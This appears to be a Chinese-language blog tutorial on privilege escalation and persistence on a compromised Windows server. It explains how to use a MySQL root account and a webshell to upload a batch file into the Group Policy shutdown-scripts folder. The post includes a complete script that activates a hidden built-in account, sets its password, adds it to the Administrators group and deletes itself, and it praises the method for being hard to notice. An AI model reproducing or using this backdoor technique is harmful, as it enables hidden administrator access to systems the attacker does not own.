提权思路――mysql root账号上传bat到组策略关机脚本提权

嗯，组策略关机脚本貌似是很长时间之前在某个留后门的动画中看到的。

今天遇到一个情况，得到了mysql的root密码，但是由于杀软，mysql backdoor和udf都无法使用，于是去尝试了下很久之前的一个想法。

嘛嘛，先来说说组策略关机脚本是什么东西。开始运行→gpedit.msc，在windows设置里就可以看到关机脚本（当然还有开机的）。

这个和启动项是一样的，不同的是这个关机时才会运行，隐藏性更好。



现在我们来看看它在哪，在这里C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Shutdown，所以我们只要把bat上传到这个文件夹里就行了。



上传的功能webshell自己就带，mysql上传下载



upto填路径，文件名很重要，然后选择文件就选择自己写的bat就好了，这里给大家提供一个乱写的bat，可能有错误哈。

@title SQLCHECK

@echo off

@net user SUPPORT_388945a0 /active:yes

@net user SUPPORT_388945a0 my1234!@#$

@net localgroup administrators SUPPORT_388945a0 /add

@pushd C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Shutdown

@del sqlcheck.bat

@exit

@exit

@exit出现两次是有原因的。



需要注意的是必须有SUPPORT_388945a0这个内置的账号




我们可以用webshell看看有没有上传成功，已经有了。不知道为什么我用的webshell上传两个bat在一起，也许只是我shell的问题吧。多写一行应该能避免错误。



额 还是新手可能还有错误，欢迎指正。